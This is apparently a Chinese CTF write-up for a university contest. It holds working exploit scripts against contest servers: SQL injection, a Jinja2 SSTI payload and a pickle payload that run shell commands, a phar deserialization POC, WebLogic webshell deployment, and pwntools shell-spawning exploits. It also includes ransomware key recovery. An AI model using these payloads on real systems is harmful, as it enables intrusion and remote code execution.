# CUMT国庆赛WP By None
## 1、Web
### sql1
使用'/**/||'1'='登录得到账户密码为Alice,123456
在information_schema.columns查表名库名和字段名得到flag位于当前数据库的flag_table_1表当中,字段名为flag
运行以下脚本获得flag
```python=
import requests
import time
baseurl='http://219.219.61.234:32769/index.php'
result=''
for i in range(4000):
time.sleep(0)
high = 127
low = 32
mid = (high + low) // 2
while high > low:
tmplate = {'username': 'Alice','password':''}
tmplate['password'] ='123456\'^if((ascii(right((select/**/group_concat(flag)/**/from/**/flag_table_1),{num}))<{ascii}),0,1)^\''.format(num=i, ascii=mid)
payload=tmplate
response = requests.post(url=baseurl,data=payload)
if 'Alice' in response.text:
high = mid
else:
low = mid + 1
mid = (high + low)//2
result += chr(mid-1)
print(i, mid)
print(result[::-1])
```
### SQL2
测试发现sleep,if,information_schema,right,left,substr,substring,空格都被ban了,
不过至少select和union都还是好的,被ban了的函数和数据库我们可以找到替代方法:
1.使用benchmark()函数替代sleep函数
2.使用正则匹配的从字符串头普匹配,结合=替代ascii(substr((select/**/...),0,1)))这种逐个获取单个字符串并判断的方法
3.使用mysql.db代替information_schema获取表名列名,字段名有没有无所谓,可以使用无列名联合注入,而且一般来说存放flag的表大多为3~4个字段,并不用尝试太多次
先通过select/**/version()查找到mysql版本为8.0.26
通过select/**/version()查找到用户名为admin
通过版本数据库查询,可以利用mysql.db查出数据库名database_name和表名table_name
得知flag在数据库flagisHere的flAg表中
由于information_schema被过滤掉了,mysql和sys库中也没找到其他记录有列名的库,所以使用无列名注入
(直接在脚本的command输入要执行的查询命令即可)
```python=
import requests
import time
#map包含了常用于储存和输出数据的字符:0~9 A~Z a~z , _ ~ @ . 空格
map=[]
for i in range(ord('0'),ord('9')):
map.append(i)
for i in range(ord('a'),ord('z')):
map.append(i)
for i in range(ord('A'),ord('Z')):
map.append(i)
add=[ord('_'),ord(','),ord('~'),ord('@'),ord('.'),ord(' ')]
for i in add:
map.append(i)
baseurl='http://219.219.61.234:54380/login.php'
temp=''
map.append(0)#0是结束位,轮到0时表示前面的字符都不合适
for i in range(100):
for i in map:
p1="'^(select/**/group_concat(1,2,user(),BENCHMARK(10000000,'test'))/**/from/**/mysql.db/**/where(("
p2=")/**/regexp/**/'^{num}'))||'"
#command="select/**/version()"
#command="select/**/user()"
command="select/**/(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/flagisHere.flAg)x)"
tmplate = {'username': p1+command+p2,'password':''}
right=temp+chr(i)#从左向右逐个探测字符
t=right
tmplate['username']=tmplate['username'].format(num=t)
time1=time.time()
response = requests.post(url=baseurl,data=tmplate)
time2=time.time()
print( t,'\t')
if time2-time1>0.15:
temp=t
print(temp)
break
if i==0:
print('end')
a=input()
print(temp)
```
### WEB4
同sql1
```python=
import requests,time
baseurl='http://81.69.241.44:25500/'
result=''
for i in range(4000):
time.sleep(0)
high = 127
low = 32
mid = (high + low) // 2
while high > low:
tmplate = {'username': 'Alice','password':''}
#tmplate['password'] ='123456\'^if((ascii(right((select/**/group_concat(table_name,\'.\',column_name,\'|\')/**/from/**/information_schema.columns/**/where/**/(1<>(table_schema<>database()))),{num}))<{ascii}),0,1)^\''.format(num=i, ascii=mid)
tmplate['password'] = '123456\'^if((ascii(right((select/**/group_concat(flag)/**/from/**/flag_table_1),{num}))<{ascii}),0,1)^\''.format(num=i, ascii=mid)
payload=tmplate
response = requests.post(url=baseurl,data=payload)
if 'good' in response.text:
high = mid
else:
low = mid + 1
mid = (high + low)//2
result += chr(mid-1)
print(i, mid)
print(result[::-1])
```
### SSTi
输入{{7*7}}得到回显49,猜测为jinja2的ssti注入,使用tplmap测试确实为jinja2,不过并不能从tplmap工具直接获取命令执行权限,手工测试发现[]和__都被禁了,不过config还可以得到正常回显,通过联合利用|attr()和reques.args配合GET传参逐步
逐步探测得到以下获取popen函数并执行的过程:
config.__class__.__base__.__base__.__subclasses__().__getitem__(245).__init__.__globals__.__getitem(__builtins__).__getitem__(eval)(__import__('os')..popen('cat /flag'))
构造出以下payload获取flag
> http://219.219.61.234:48000/hello?name={{config|attr(request.args.a)|attr(request.args.b)|attr(request.args.c)|attr(request.args.d)()|attr(request.args.e)(245)|attr(request.args.f)|attr(request.args.g)|attr(request.args.h)(request.args.i)|attr(request.args.j)(request.args.k)(request.args.l)}}&a=__class__&b=__base__&c=__base__&d=__subclasses__&e=__getitem__&f=__init__&g=__globals__&h=__getitem__&i=__builtins__&j=__getitem__&k=eval&l=__import__(%22os%22).popen(%22cat%20/flag%22).read()
### ez_upload
1.看题
进入界面得到include 'file'显然是提醒会包含file参数的文件,猜测应该是文件包含题
2.访问robots.txt
得到上传文件的地方:up10de.php
结果上传测试后发现只能上传png,jpeg,gif的图片,而且简单以GIF89a的文件马并不能蒙混过关,而且会提示函数报错,看样子是会图片渲染,失败了就直接jj,直接上传失败
3.通过上传正常文件图片,然后写入木马,这样子可以上传成功,下载图片发现虽然看起来图片渲染后无变化,但是通过010打开会发现里面的数据已经面目全非了
4.寻找数据没有被改变的区域插入一句话木马,我用的是gif图片,下载后看到写入的🐎确实还在
5.最烦的地方来了,找传参file的地方,我直接裂开,找了半天后面才知道默认首页就是传参的地方,因为之前我上传的图片在默认首页file传参后include丝毫没有一点反应是因为图片渲染失败(貌似是)就会让页面没有一点变化,后面通过删减图片数据段解除include的出错,成功getshell
6.5.图片马(下载上传即可使用post传shell参数执行命令)这个是图片马,下载可用:
### web6
(cookies+python反序列化pickle)
根据题目提示cookie,复制cookie进行base64解码看到一个cumter,而页面显示就是hello cumter,所以这就导致了见识窄的我以为是SSI或XSS漏洞,试了几个poc没反应,到网上找了一堆exp但是没一个有用的,最后在放出hint:pickle后才知道这个是pickle的python反序列化
去了解学习了pickle.loads()的反序列化过程和发序列化语句后构造payload,但是当时测试发现貌似如果发序列化后{'username':''}其中的value如果是非string根本不会有回显,不过一点小曲折过后学会了builtins.getattr()这个万金油函数后成功构造payload:
>
POC:
(dp0
Vusername
p1
cos
popen
(Vcat /flag
tRp2
0cbuiltins
getattr
(g2
Vread
tRp3
(tRp4
s.
#base64加密后为:KGRwMApWdXNlcm5hbWUKcDEKY29zCnBvcGVuCihWY2F0IC9mbGFnCnRScDIKMGNidWlsdGlucwpnZXRhdHRyCihnMgpWcmVhZAp0UnAzCih0UnA0CnMu
burp抓包修改一下cookie即可获得flag
以下为本地测试脚本:
```python=
import pickle,base64
a='KGRwMApWdXNlcm5hbWUKcDEKY29zCnBvcGVuCihWZGlyCnRScDIKMGNidWlsdGlucwpnZXRhdHRyCihnMgpWcmVhZAp0UnAzCih0UnA0CnMu'
test=pickle.loads(base64.b64decode(a))
print(test)
print(test['username'])
```
### web5
phar文件上传
在/file.php?show=页面获取到base.php,class.php,function.php,upload.php,file.php的源码打包到source.zip中分析,显示文件的只有Show的highlight_file函数和Cloud的base64_encode(file_get_contents($this->value))以为highlight_file的flag字符串被过滤了,所以只能考虑Cloud类的file_get_contents
分析class.php可以发现能通过构造pop链触发file_get_contents函数,但是没有接口对类进行反序列化,结合文件上传的题目环境可知,应该是上传phar文件并通过phar://协议读取上传的phar文件,触发反序列化漏洞,得到poc:
```php=
<?php
// use File as GlobalFile;
// class File{
// public $fakefile;
// public $file;
// public function __construct($file)
// {
// $this->fakefile='fake';
// $this->file = $file='test';
// }
// public function __destruct()
// {
// $this->file=$this->fakefile;
// echo $this->file;
// }
// }
// class Show{
// public $filename;
// public function show()
// {
// if(preg_match('/\.\.|flag/i',$this->filename)) {
// die('hacker!');
// } else {
// highlight_file($this->filename);
// }
// }
// }
// class Docker{
// public $str;
// public $container1;
// public $container2;
// function __toString()
// {
// if (isset($this->str))
// return $this->str->get_file();
// }
// }
// class Cloud{
// private $value;
// public $docker;
// function get_file(){
// $this->test=unserialize($this->docker);
// if($this->test->container1===$this->test->container1){
// $text = base64_encode(file_get_contents($this->value));
// return $text;
// }
// }
// }
//---------------------------------上面为class.php源码下面为POC-----------------------------------------------------
class File{
public $fakefile;
public $file;
public function __destruct()
{
$this->file=$this->fakefile;
echo $this->file;
}
}
class Docker{
public $str;
public $container1;
public $container2;
function __toString()
{
if (isset($this->str))
return $this->str->get_file();
}
}
class Cloud{
private $value;
public $docker;
function __construct()
{
$this->value='/var/www/html/flag.php';//var/www/html路径可以在show.php处测试得到
}
function get_file(){
$this->test=unserialize($this->docker);
if($this->test->container1===$this->test->container1){
$text = base64_encode(file_get_contents($this->value));
return $text;
}
}
}
$file=new File();
$docker=new Docker();
$cloud=new Cloud();
$docker1=new Docker;
$docker1->container1='1';
$cloud->docker=serialize($docker1);
$docker->str=$cloud;
$file->fakefile=$docker;
echo serialize($file);
//unserialize(serialize($file));//测试输出本地的/var/www/html/flag.php文件
$phar = new Phar("1.phar"); //生成phar文件
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($file);
$phar->addFromString("test.txt", "test");
//生成签名
$phar->stopBuffering();
```
分析文件可知上传的png,jpg,jpeg,gif文件的文件名会被经过md5加密后加上.jpg然后上传到文件夹./upload/
运行上面脚本生成1.phar文件后改名为1.png后上传
访问/show.php,使用phar://伪协议加载上传的phar文件4a47a0db6e60853dedfcfdf08a5ca249.jpg(1.png结果md5重命名后的文件名)
访问/show.php?file=phar://./upload/4a47a0db6e60853dedfcfdf08a5ca249.jpg
得到flag.php的base64编码后的结果
解码得到flag
####sql2
### web7
Weblogic(weak_password)任意文件读取、口令破解、文件上传,漏洞复现,
进入题目提示读取password,然后可以进入console,到console发现是一个Oracle的weblgic登录平台,另外给了任意文件读取漏洞的入口file.jsp,到网上查找weblogic的相关漏洞信息,找到与当前题目相对吻合的漏洞复现文章:
复现过程主要包括主要包括:
利用任意文件读取漏洞获取SerializedSystemIni.dat和config/config.xml
1.直接访问/hello/file.jsp?path=security/SerializedSystemIni.dat和/hello/file.jsp?path=config/config.xml
获得密码经AES加密后的密文和加密使用的AES数据
(<node-manage-password-encrypted>标签里面的数据)
2.注意:网上直接访问下载的二进制数据会有问题,应该属于burp抓包然后保存数据到文件即可
3.到https://github.com/TideSec/Decrypt_Weblogic_Password下载解密工具
4.加载\Tools5-weblogic_decrypt里面的jar文件打开工具,选取保存的二进制文件和AES数据解密获得密码
5.部署有jsp马的war
6.访问jsp马路径,成功getshell获取根目录下存放的flag的文件
详细过程可参考[https://blog.csdn.net/cscscys/article/details/107856619](https://)
## 2、PWN
### pwn1
nc 连上 直接cat flag
### pwn2
经典栈溢出
```python
from pwn import *
#r=process("./pwn2")
r=remote('1.15.81.218',10001)
p=b'a' * 72 + p64(0x400596)
r.sendline(p)
r.interactive()
```
直接传就行了...
### pwn3
开了NX保护,没开金丝雀
有个echo flag,感觉像是那么回事,实际上没用,
所以还是得通过system函数来搞
这里s大小是0x28,所以只能溢出0x8字节,不够写太长的,但是这里可以读两次,所以思路是第一次泄露ebp地址,第二次写入system(‘/bin/sh’),然后用leave;ret栈劫持s,执行system('/bin/sh')
要劫持s要知道s的地址,可以通过动调知道ebp到s的距离,然后计算
ebp到s的距离为0xffffc1f8 - 0xffffc1c0 = 0x38
所以ebp:
```python
p = b'a'*0x27+b'b'
r.send(p)
r.recvuntil(b'b')
ebp = u32(r.recv(4))
```
可以得到ebp的地址,然后-0x38得到s
完整exp:
```python
from pwn import *
r=process('./pwn3')
#r=remote('1.15.81.218',10002)
sys_addr=0x8048400
leave_ret=0x08048562
main_addr=0xdeadbeef
p=b'a'*0x27+b'b'
r.send(p)
r.recvuntil(b'b')
s_addr=ebp=u32(r.recv(4))-0x38 # ebp-s=0x38
print(s_addr)
p2=b'aaaa'+p32(sys_addr)+p32(main_addr)+p32(s_addr+0x10)+b"/bin/sh"
p2=p2.ljust(0x28,b'\x00') # /bin/sh添上\x00
p2+=p32(s_addr)+p32(leave_ret) # hijack s
r.send(p2)
r.interactive()
```
### brute?
brute canary,暴力破解金丝雀
```python
from pwn import *
from LibcSearcher import *
#r = process('./brute')
r=remote('1.15.81.218',20000)
canary = b'\x00'
def find():
global canary,r
#r = process('./brute')
r=remote('1.15.81.218',20000)
print(r.recvuntil(b'2021!\n'))
canary = b'\x00'
for j in range(3):
for i in range(0x100):
r.send(b'a'*100 + canary + bytes(chr(i).encode()))
a = r.recvuntil(b'2021!\n')
if b'Successfully' in a:
canary += bytes(chr(i).encode())
print(canary)
break
if(len(canary)!=4):
find()
find()
print(canary)
elf = ELF('./brute')
system = elf.plt['system']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = 0x08048560
p1 = b'a' * 100 + canary +b'a'*12+ p32(puts_plt) + p32(main) + p32(puts_got)
#print(r.recvuntil(b'2021!\n'))
r.sendline(p1)
puts_addr = u32(r.recv()[0:4])
print('puts_addr:',puts_addr)
libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.dump('puts')
sys_addr = base + libc.dump('system')
bin_sh = base + libc.dump('str_bin_sh')
p2 = b'a' * 100 + canary +b'a'*12+ p32(sys_addr) + b'a' * 4 + p32(bin_sh)
r.sendline(p2)
r.interactive()
```
爆破好慢...
CUMTCTF{5305918b-e080-4f2d-b9b1-8a6f3ed727d5
### pwn4
edit的地方有个堆溢出漏洞
l33t是后门函数,想要触发需要使位于bss的(unsigned __int64)magic > 0x1305
unsorted bin attack,修改magic的值为unsorted bin的地址,可以使magic > 0x1305
...
被坑了。。。
竟然不是这个目录。。。。。。。。。。。
然后打算修改一下system指令的字符串,发现这个字符串被存在rodata,只读
只能重新搞
想办法控制heaparray,
用fake chunk修改heaparray[0]为free_got的地址,然后用edit()修改free_got为system的地址
接下来就free掉一个存了 /bin/sh\x00 的chunk,这样就可以getshell了,这个可以事先创建好这样的一个chunk来实现,然后用delete_heap调用free
fake chunk的话,可以再搞两个chunk,free第一个chunk,然后修改另一个造成堆溢出来修改第一个chunk的fd指针,使其指向fake chunk
```python
from pwn import *
#r=process("./pwn4")
r=remote('1.15.81.218', 10003)
elf=ELF("./pwn4")
heaparray=0x006020E0
fake_fastbin=0x6020ad
system_addr=0x400C2C
free_got=elf.got["free"]
def create(size,content):
r.recvuntil("Your choice :")
r.sendline(str(1))
r.recvuntil("Size of Heap : ")
r.sendline(str(size))
r.recvuntil("Content of heap:")
r.sendline(content)
r.recvuntil("SuccessFul")
def delete(index):
r.recvuntil("Your choice :")
r.sendline(str(3))
r.recvuntil("Index :")
r.sendline(str(index))
r.recvuntil("Done !")
def edit(index,size,content):
r.recvuntil("Your choice :")
r.sendline(str(2))
r.recvuntil("Index :")
r.sendline(str(index))
r.recvuntil("Size of Heap : ")
r.sendline(str(size))
r.recvuntil("Content of heap : ")
r.sendline(content)
r.recvuntil("Done !")
create(0x10,b'a' * 0x10) # idx0
create(0x10,b'a' * 0x10) # idx1
create(0x60,b'b' * 0x10) # idx2
create(0x10,b'/bin/sh\x00') # id3
delete(2)
edit(1,0x30,0x10 * b'a' + p64(0) + p64(0x71) + p64(0x6020ad) + p64(0))
create(0x60,b'd' * 0x10) # idx1
p=0x23 * b'e' + p64(free_got)
create(0x60,p) # idx4
edit(0,0x8,p64(0x400C2C))
r.recvuntil(b"Your choice :")
r.sendline(str(3))
r.recvuntil(b"Index :")
r.sendline(str(3))
r.interactive()
```
## 3、Reverse
### 签到
拖进IDA就能看到flag
### net
.net逆向,输入主要处理函数如上,涉及到取模不好逆推,直接爆破。
```python=
a=[30361,550,595,15412,30361,15412,8346,27071,37594,37534,9781,1082,19619,9781,1082,15513,29591,19596,30078,27942,25366,29107,7433,28493,9781,29591,2664,12540]
k=[]
def dunc(a,b,c) :
num=1
a %= c
while (b != 0):
flag = b % 2 == 1
if flag:
num = num * a % c
b >>= 1
a = a * a % c
return num
for j in range(len(a)):
for i in range(255):
if dunc(i,377,38009)==a[j]:
k.append(i)
for m in k:
print(chr((m-28)&0xff),end='')
```
### easyAPK
原本是一个有360加固的题,网上搜索能找到脱壳的方法,这里我用的BlackDEX32配合MT和NP管理器进行脱壳。
不过脱壳之后用jadx没找到关键点,搜索check和Try again也没找到,不过在smail里面发现了端倪,用jeb加载一下能看到大致逻辑和后面减弱难度后的逻辑类似,但是拼的是哪个字符串看不出来=.=。
后面放的难度就是白给了,无壳直接找到字符串即可,最后一个在native层。
first → We1c0me
We1c0me_t0_easyAPK
### vm
刚开始是filter,看sys里面的代码硬看理不清逻辑,很多下标的跳转,自己也不会动调这个文件。之后换成了windos文件,逻辑看起来就比较清楚,有个switch并且有个Byte数组在内存中很整齐有点类似机器码。所以采用了vm技术,调度器和opcode都比较少,不写脚本通过静态就能分析出,开始4个是寄存器,之后根据opcode一条条执行,简化后的算法就是a+b==xxx 和 a*b=xxx的比较,解出来的顺序根据自己动调时的比较调一调即可,懒得看了。
```python=
a=[0x41, 0x10, 0x72, 0x61, 0x00, 0x00, 0x00, 0x50, 0x40, 0x20,
0x41, 0x40, 0x04, 0xB0, 0x9F, 0x94, 0x62, 0x70, 0x61, 0x00,
0x00, 0x00, 0x50, 0x40, 0x30, 0x01, 0x40, 0x04, 0x87, 0x4F,
0x57, 0x94, 0x70, 0x61, 0x00, 0x00, 0x00, 0x40, 0x05, 0x19,
0x88, 0x7D, 0x09, 0x70, 0x61, 0x00, 0x00, 0x00, 0x41, 0x23,
0x71, 0x61, 0x00, 0x00, 0x00, 0x50, 0x42, 0x20, 0x43, 0x40,
0x04, 0x7F, 0xBD, 0xAB, 0xA3, 0x70, 0x61, 0x00, 0x00, 0x00,
0x50, 0x42, 0x30, 0x03, 0x40, 0x04, 0xEE, 0x5F, 0x71, 0xEF,
0x70, 0x61, 0x00, 0x00, 0x00, 0x40, 0x05, 0xBC, 0xD3, 0x04,
0x16, 0x70, 0x61, 0x00, 0x00, 0x00, 0xFE, 0xFF]
print((0x10>>4)%6)
print((0x10&0xf)%6)
print((0x40>>4)%6)
print((0x40&0xf)%6)
print((0x41>>4)%6)
print((0x41&0xf)%6)
print(chr(ord('0')+ord('4')))
#b[1]+b[4]==0x62949fb0
#即b[0]+b[1]=0x62949fb0
# 0x50 + 0x40 是b[4]=b[0]
#0x30 + 0x01 是
#b[4]*b[1]= b[0]*b[1]=0x94574f87
#0x70 0x61 0x00 0x00 0x00 0x00
#进行check 如果相等就继续 不等就结束
#0x40 +0x05 后面是 第六部分的比较.
#0x19,0x88, 0x7D, 0x09
#0x41 + 0x23要求 b[2] != b[3]
print((0x42>>4)%6)
print((0x42&0xf)%6)
#0x50 + 0x42 是把第三部分赋值给第五部分
#0x20+0x43
print((0x43>>4)%6)
print((0x43&0xf)%6)
#第五部分 与 第4部分相加 b[4]+b[3]=
#之后比较 0x7F, 0xBD, 0xAB, 0xA3
#0x50 +0x42 #第三部分赋值
#0x30+0x03 是 b[4]*b[3] =
#之后比较 0xEE, 0x5F, 0x71, 0xEF 注意小端序
#0x40+0x05 是 第六部分 和 0xBC, 0xD3, 0x04,0x16比较
```
直接硬读opcode边条边读,知道0x30,0x20,0x40,0x70开头代表什么指令后就比较简单了。
```python=
from z3 import *
import gmpy2
from Crypto.Util.number import *
a1=BitVec('a1',32)
a2=BitVec('a2',32)
a3=BitVec('a3',32)
a4=BitVec('a4',32)
s=Solver()
s.add((a1+a2)&0xffffffff==0x62949fb0)
s.add((a1*a2)&0xffffffff==0x94574f87)
s.add((a3+a4)&0xffffffff==0xa3abbd7f)
s.add((a3*a4)&0xffffffff==0xef715fee)
s.check()
print(s.model())
print(long_to_bytes(2974637891)[::-1])
print(long_to_bytes(2974236781)[::-1])
print(long_to_bytes(826689870)[::-1])
print(long_to_bytes(1919251505)[::-1])
a='4d5f43'
b='47406d'
for i in range(0x80):
a1=hex(i).zfill(2)+a
for j in range(0x80):
b1=hex(i).zfill(2)+b
c=int(a1,16)
d=int(b1,16)
if (c+d)&0xffffffff ==0x62949fb0 and (c*d)&0xffffffff ==0x94574f87:
print(long_to_bytes(c)[::-1],long_to_bytes(d)[::-1])
break
```
当时感觉乘法可能会有越界,所以直接用z3解,不过有不可见字符,最后在小范围下爆破不可见就行,做麻烦了,不想改了,以后绝对求根公式。
#flag{m@G1C_M1NIF11ter}
### pthread
运行一下,缺少pthread.dll文件,百度下载就行,之后查壳,ASPack壳,脱壳机对应版本的没找到,32位exe直接丢进OD用esp脱壳定律,如果是在XP以后的版本脱壳,基址会有所改变,OD中按m查看PE文件的基地址在dump时候改一下即可,oddump出的文件调不起来有点难受,或许要用ImportREC修复一下。
直接拖进IDA中查看源码,有很多小细节容易犯错,写在注释里了。
整体逻辑就是先异或,之后从0开始取出当前字节的1 3 5 7位(下标从0开始,从右往左),和下一个字节的0 2 4 6位重组为一个,然后5个一组,一共5大组。
还原exp,也想到会不会线程的顺序并不是按照顺序来的,不过也就是换一下明文的顺序就好。
```python=
from itertools import permutations
enc=[0x0d,0x5b,0x5e,0x21,0x69,0x25,0x4f,0x5d,0x4d,0x3d,0x6b,0x1b,0x5a,0x17,0x43,0x32,0x68,0x38,0x5e,0x4f,0xc,0x23,0x7e,0x25,0x7c]
def decrypt(enc):
for i in range(len(enc)):
if i==0:
a=bin(enc[len(enc)-1])[2:].zfill(8)[-4:]
else:
a=bin(enc[i-1])[2:].zfill(8)[-4:]
b=bin(enc[i])[2:].zfill(8)[:4]
m=''
for j in range(4): #...开始写成i了
m+=b[j]+a[j]
print(chr(int(m,2)^(i)),end='')
#print()
cbox=[]
for i in range(len(enc)//5):
cbox.append(enc[5*i:5*i+5])
for i in range(5):
decrypt(cbox[i])
#Are_-Y0ur_-FeE1_-HapPY-_?
```
### ill formed
这个题是真的宝藏题目,32位程序IDA载入,一开始看不出啥逻辑,猜测是用了混淆或者是花指令,结果都不是=.=
看到这里,联想到一个知识点,retf 是修改ip 和 cs的值 而在修改前push了 0x33 并且通过call押进去返回地址,然后对返回地址值加5,最后retf ,所以最终cs的值是0x33 , 而cs=0x33也意味着接下来要以64位来解析代码,所以这是在32位程序中调用了64位程序。
想着直接修改PE文件标志文件位数的标识来拖入IDA64中分析一波,可是后来还有类似这种切换,又从64回到了32,所以IDA64中的解析也是错误的。0x10B改为0x20B
参考网上的古老讲解https://www.163.com/dy/article/E8SMV14K0511FSTO.html。 IDC脚本之后会用到。
这篇文章整体意思就是要么就能让他F5反编译,在32和64位间切换,要么就是要动调起来猜测过程,=.=我都没有实现。
那就回到老本行,直接硬逆,用里面的IDC脚本dump出一段64位的程序,拖入IDA64中查看。
```c=
static main(void) {
auto fp, begin, end, dexbyte;
fp = fopen("D:\111.mem", "wb");
begin = 0x0040116C; end = 0x004012D6;
for ( dexbyte = begin; dexbyte < end; dexbyte ++ )
fputc(Byte(dexbyte), fp); }
```
不要老想着F5反编译,汇编一般最接近真实的逻辑,看了眼汇编用到了64位的寄存器r8和r9,然后结合32位的代码大多是赋值操作,结合32位下的寄存器是32位,并且flag只有16字节,所以猜出是直接将flag分为4段,然后传入64位下用两个64的寄存器来存储。
这个是我直接修改pe标识在64位ida下把每个64位代码定义为函数的结果,这个反编译有错误,只需要看大致的加密结构。有点像密码学中的festil轮函数,每次只对r8寄存器和r9寄存器计算后的值异或,一共有6轮,并且每次的循环次数不一样。分析一下汇编,发现天堂之门,rbx寄存器是64位,也就是把传入的eax,ebx,ecx,edx 4个4字节变成两个8字节来处理,处理6轮,每轮的循环次数都不一样,主要就是异或和交换,尝试逆一下
exp
```python=
from Crypto.Util.number import *
eax=0x7457B95A
ebx=0xC7638E3C
ecx=0x4E66BC65
edx=0xDD0F9728
dc = int(str(ebx)[2:] + str(eax)[2:], 16)
for i in range(0xc013):
dc=(dc*0x7132 + 0x139783)&0xffffffffffffffff
ba=(edx<<32)|(ecx)
ba=(dc^ba)&0xffffffffffffffff
edx,ecx=ebx,eax
ebx=ba>>32
eax=ba&0xffffffff
dc = int(str(ebx)[2:] + str(eax)[2:], 16)
for i in range(0x55bf):
dc=(dc*0x7132 + 0x139783)&0xffffffffffffffff
ba=(edx<<32)|(ecx)
ba=(dc^ba)&0xffffffffffffffff
edx,ecx=ebx,eax
ebx=ba>>32
eax=ba&0xffffffff
dc = int(str(ebx)[2:] + str(eax)[2:], 16)
for i in range(0xc109):
dc=(dc*0x7132 + 0x139783)&0xffffffffffffffff
ba=(edx<<32)|(ecx)
ba=(dc^ba)&0xffffffffffffffff
edx,ecx=ebx,eax
ebx=ba>>32
eax=ba&0xffffffff
dc = int(str(ebx)[2:] + str(eax)[2:], 16)
for i in range(0x19e4):
dc=(dc*0x7132 + 0x139783)&0xffffffffffffffff
ba=(edx<<32)|(ecx)
ba=(dc^ba)&0xffffffffffffffff
edx,ecx=ebx,eax
ebx=ba>>32
eax=ba&0xffffffff
dc = int(str(ebx)[2:] + str(eax)[2:], 16)
for i in range(0x7a20):
dc=(dc*0x7132 + 0x139783)&0xffffffffffffffff
ba=(edx<<32)|(ecx)
ba=(dc^ba)&0xffffffffffffffff
edx,ecx=ebx,eax
ebx=ba>>32
eax=ba&0xffffffff
dc = int(str(ebx)[2:] + str(eax)[2:], 16)
for i in range(0x5b24):
dc=(dc*0x7132 + 0x139783)&0xffffffffffffffff
ba=(edx<<32)|(ecx)
ba=(dc^ba)&0xffffffffffffffff
edx,ecx=ebx,eax
ebx=ba>>32
eax=ba&0xffffffff
print(long_to_bytes(eax)[::-1].decode(),end='')
print(long_to_bytes(ebx)[::-1].decode(),end='')
print(long_to_bytes(ecx)[::-1].decode(),end='')
print(long_to_bytes(edx)[::-1].decode(),end='')
#W@y_TO_ThEHe@V3N
```
### ransomeware
勒索病毒分析,最近挺热们的一个考点,不过学长混入了npc,模拟了小白被勒索病毒攻击,怎么帮他解决问题的过程。
有很多地方有异或的操作,所以在调之前拿到python中异或一下,看是不是明文
```python=
v11 -> Incredible! But you'll stop here
v14 -> C:\flag.docx
v10 -> SOFTWARE\Microsoft\Cryptography
v12 ->
v14 -> ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-
{6EDD 6D74-C007-4E75-B76A-E5740995E24C}
E le va ti on :A dm in is tr at or !n ew :{ 3E 5F C7 F9 -9 A5 1- 43 67 -9 06 3- A1 20 24 4F BE C7 }
#在前面的一个函数感觉是要拿到权限
```
开始没有思路,感觉有啥smc或者花指令的,但并没有,并且根据这些异或的字符串拿到了很多信息,根据以往的勒索病毒,大概是在c:/创建 flag.docx 之后才能开始调,中间貌似看到了salsa20加密。
salsa20加密,搜索expand 32-byte k 就能找到
http://www.crypto-it.net/eng/symmetric/salsa20.html
确实能调起来,但是遇到dword .data段的当函数名 。。而且值是0 ,一调就崩溃了,大概是ida的锅,毕竟用OD好好的,可以大致在ida中看清加密的结构,因为加密算法没有魔改还是流密码,所以我们只要拿到两个随机数,之后patch掉随机生成的在进行一次加密就完成了解密。
随机数可能和flag加密文件后缀的base64有关,因为base解密后是8字节,而那两个随机数正好是两个4字节,不过base也被换表了,并且有对随机数的异或处理。
对随机数的处理,在a1字符串中每次索引一个 和 a2即传入的参数循环右移动13位后的数加起来,循环len(a1)+1次不过有个坑,‘\0’也算一次,通过OD动调了解到a1是本机的GUID码,通过自己本机测试可以现在本地恢复自己加密的文件。
```python=
import base64
from Crypto.Util.number import *
newtable='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-'
table='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
s='n8OKZcEVdSp='
m=''
for i in range(len(s)):
m+=table[newtable.find(s[i])]
print(hex(bytes_to_long(base64.b64decode(m))))
def ror13(n):
s=bin(n)[2:].zfill(32)
tmp=s[-13:]+s[:-13]
#print(hex(int(tmp,2)))
return int(tmp,2)
key='0bebe7bc-793f-4ccf-be83-9f6b9b4de948'
n=[0]*(len(key)+1)
for i in range(len(key)):
n[i+1]=(ord(key[i])+ror13(n[i]))&0xffffffff
print(hex(ror13(n[-1])))
k=[0]*(len(key)+1)
k[0]=0x15dca90b #第一个随机数
for i in range(len(key)):
k[i+1]=(ord(key[i])+ror13(k[i]))&0xffffffff
#for i in k:
# print(hex(i))
print(hex(ror13(k[-1]))) #最后一步还有操作
```
本地是可以打通的,但要想解该题的话,核心就是拿到出题人在生成文件时的随机数,我们知道随机数的生成过程,所以只要只要知道出题人的MachineGuid码即可,学长为了模拟真实场景,中间插个啥也不会的NPC就很有趣。
加npc qq指导他拿到guid码,之后便对附件的文件解密。
```python=
import base64
from Crypto.Util.number import *
newtable='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-'#换和不换对本题影响不大
table='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
s='sbJXsFrM2zF='
m=''
for i in range(len(s)):
m+=table[newtable.find(s[i])]
print(hex(bytes_to_long(base64.b64decode(m))))
#b1b257b0 5accdb31
def ror13(n): #循环右移13
s=bin(n)[2:].zfill(32)
tmp=s[-13:]+s[:-13]
#print(hex(int(tmp,2)))
return int(tmp,2)
key='2aa2d31e-751e-4a33-8542-62c8bacedaf6'
n=[0]*(len(key)+1)
for i in range(len(key)):
n[i+1]=(ord(key[i])+ror13(n[i]))&0xffffffff
print(hex(ror13(n[-1]))) #可以通过动调发现 他是
#还原第一个随机数
print('r1=',hex(0xb057b2b1^0x51e64a7b))
k=[0]*(len(key)+1)
k[0]=0xe1b1f8ca #第一个随机数
for i in range(len(key)):
k[i+1]=(ord(key[i])+ror13(k[i]))&0xffffffff
#for i in k:
# print(hex(i))
print(hex(ror13(k[-1]))) #最后一步还有操作
#0xebb9f8f6
#0x1a4a41e5
print('r2=',hex(0xc2bf46e0^0x31dbcc5a))
```
注意小端,拿到r1和r2
OD动调,修改eax的值来修改两个随机数,之后直接F9便对原文件解密成功。
## 4、Crypto
### 签到
